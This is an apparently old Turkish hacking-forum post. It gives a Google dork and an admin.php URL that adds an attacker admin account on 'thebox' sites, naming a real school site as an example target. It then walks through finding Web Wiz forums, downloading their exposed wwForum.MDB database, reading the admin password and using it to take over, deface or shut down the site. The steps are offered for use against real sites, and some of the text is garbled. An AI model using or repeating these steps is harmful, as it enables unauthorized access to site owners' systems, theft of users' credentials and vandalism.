Thebox Açığı WyNe rwxr-xr-x 0 22:02:00

Başlık	Thebox Açığı
Yetki	rw-r--r--
Yazar	WyNe
Zaman	22:02:00
Kategori
Share

google de aranacak kelimemiz...: inurl:thebox/thebox.php 
bunu aradıktan sonra alttaki gibi pekcok sitenin cıkmasi lazim... 

http://www.martin-buber-oberschule.de/thebox/thebox.php burdakı thebox.php silin yerine su kelımeyı yapıştırın

/admin.php?act=write&username=CLK-J35&password=111&aduser=CLK-J35&adpass=111 YAPIŞTIRIN sonra sizi gırışe yonlendırecektır

USER:CLK-J35

PASWORD:111


evet arkadaslar!!!
size datebase sifrelerini bulmayi ve web hack etmesini detaylarina kadar anlatacam! ))))
umuyorum ki cok begeneceksiniz. maksadim bilmeyenleri bilgilendirmektir....
tabi ki bunu bilenler de var....ama bilmeyenler bilenlerden cok cokfazla...ben bu gune kadar bir seyin dogru durust anlatildigini
gormedim...her kes bi yerini anlatip diger kismina dokunmuyor..
hic bir seyi birbirimizden esirgememeliyiz.....sahsen kendi adima ben bildigim ne varsa onu da anlatacam....
simdi gecelim meseleye:
ilk once yararlanacagimiz siteler:
1.hazirkod.com
2.google.com
3.belki whois.com
4.belki asp.net
simdilik yeter....datebase'e ulasmanin bir cok yolu var. mesela forumlardan*asp bosluklarindan ve.b..
simdi ilk once webwiz forumlarinin hacklenmasina bakalim.yapacagimiz ilk is google.com adresine girip
�Powered Web Wiz Forums� veya �Web Wiz Guide Forum�u aratmak(eger sonuna inurl:uk(us) yazarsak yalniz o ulkeyi arar. mesela:
Powered Web Wiz Forums inurl:uk olacak.bunu yaptiktan sora karsimiza bir cok site cikar.
bize bunlardan yalniz: ornek olarak: http://www.xxxx.org.uk/forum/default.asp - boyle olani lazim. bu tur sitelerden birinin uzerine tikliyoruz.
sonra sayfa acildiktan sonra "default.asp" olan kismini silip oraya admin/database/wwForum.MDB yaziyoruz.
Yani su sekle geliyor http://www.xxxx.org.uk/forum/admin/database/wwForum.MDB ya da http://www.xxxx.org.uk/forum/wwForum.MDB sekilde olabilir....
daha sora enter tusuna basiyoruz. ve hemen kaydet uyarısı geliyor.kaydedebilirsek cok güzel. işin yarisindan cogunu halletmiş bulunuyoruz.
ama bu yontem her sitede de gecerli degil. bazen bizden dahili sifreister. o zaman ugrasmasina degmez. bazen de hata mesaji verir.
ama mutlaka yuzde kirk oranlik bi payla DB-e ulasabilirsiniz.ben coksitelere ulasdim.ama adini vermek dogru olmaz..kendiniz biraz çaba
gösterseniz mutlaka bulacaksiniz...diyelim ki kaydet uyarisi geldi vesiz DB-i indirdiniz. DB-ler her zaman Acces'de calisir.DB-i actığınız zaman
acces kendiliginden ise duser ve bir liste ekrana gelir.burda tum kullanicilarin username ve sifresi yaziliyor.ayni zamanda admin'in de.
admin her zaman 1-ci olur(sirasina gore.yani karsisinda 1 yaziyo.ID'ninaltinda).onu bulup admin'in sifresile siteye girebilirsiniz.
peki diyelim ki girdiniz.eee?sora????iste isin en zevkvericiyani...isterseniz siteyi kapatin* isterseniz link atin* istersenizadmin
sifresini degistirip istediginiz bir sifre yazin* ya da siteyi hackedinnn.bazi forum sitelerinde admin sadece foruma bakar.baska islere
karisamaz.ama bazi sitelerde admin hem foruma bakar hem de sitenin en yetkili sahsidir.bunu anlamak icin dikkat etmelisiniz:
eger forum sayfasinin etrafinda baska linkler varsa demek ki siz hersey yapabilirsiniz.yok eger yazilardan baska bi sey yoksa o zaman
siz yalniz forumda istediginiz seyi yapabilirsiniz.bi de unutmadansoyliyim bazi sitelerde ise mutlaka kayit olmalisiniz ki DB-i elegecirebilesiniz.
anlayacaginiz biraz caba gostermelisiniz..ben her seyi demek istiyorumki sora yapamazsaniz haberiniz olsun...bi de bunu soyliim ben her ikiturlu siteni
de hack ettim.yani oluyor.isimlerini verecem....simdi diyelim kiadminin sifresile girdik ve sadece forum elimizin altinda.anlayacaginizrehberliyimiz kisitli.
admin olarak bir sey yapmak istiyorsaniz ki istedigimiz de bu* o zamanlogin olduktan sora foruma baslamadan sayfanin ustunde bir yerde"yonetim paneli" adli
tiklanasi bir yer var...onu bulup tikliyoruz* ve karsimiza yeni birsayfa geliyoo..eger gelmezse ki cogu zaman gelmez o zaman tıkladigımız zaman
ayni sayfada yetkilerimiz dahilinde yapabilecegimiz seyleraciliyor.yukarida settings veya ayarlar kisminda degistirmekistediginiz seyleri degistiriyosunuz.
ondan sorasi kolay ve size kalmis.